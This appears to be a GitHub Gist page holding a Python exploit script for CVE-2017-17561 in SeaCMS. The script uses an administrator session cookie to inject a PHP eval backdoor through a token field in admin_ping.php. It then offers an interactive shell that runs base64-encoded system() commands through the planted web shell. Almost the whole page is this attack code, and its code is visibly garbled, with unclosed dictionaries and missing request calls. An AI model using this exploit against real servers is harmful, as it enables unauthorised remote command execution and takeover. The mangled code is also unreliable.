Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
#!/usr/bin/env python
# encoding:utf-8
# Author: WangYihang
# Email:
# Comment: CVE-2017-17561 SeaCMS Authenticated Getshell
import requests
import sys
import readline
def exploit(host, port, path, session, password):
url = "http://%s:%d/%s/admin_ping.php?action=set" % (host, port, path)
data = {
"token":"123456789\";$var=eval($_REQUEST[%s]).\"" % (password)
cookies = {
response =, data=data, cookies=cookies)
print response.content
def usage(name):
print "Usage:"
print "\tpython %s [HOST] [PORT] [PATH] [PHPSESSID] [PASSWORD]" % (name)
print "Example:"
print "\tpython %s 80 admin n2njegrc8dfb5fvuckb2qbnr46 c" % (name)
def interactive(url, password):
while True:
command = raw_input("$ ")
if command == "exit":
data = {
password:"system(base64_decode('%s'));" % (command.encode("base64").replace("\n", ""))
print, data=data).content
def main():
if len(sys.argv) != 6:
host = sys.argv[1]
port = int(sys.argv[2])
path = sys.argv[3]
session = sys.argv[4]
password = sys.argv[5]
exploit(host, port, path, session, password)
url = "http://%s:%d/data/%s/ping.php" % (host, port, path)
interactive(url, password)
if __name__ == "__main__":
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.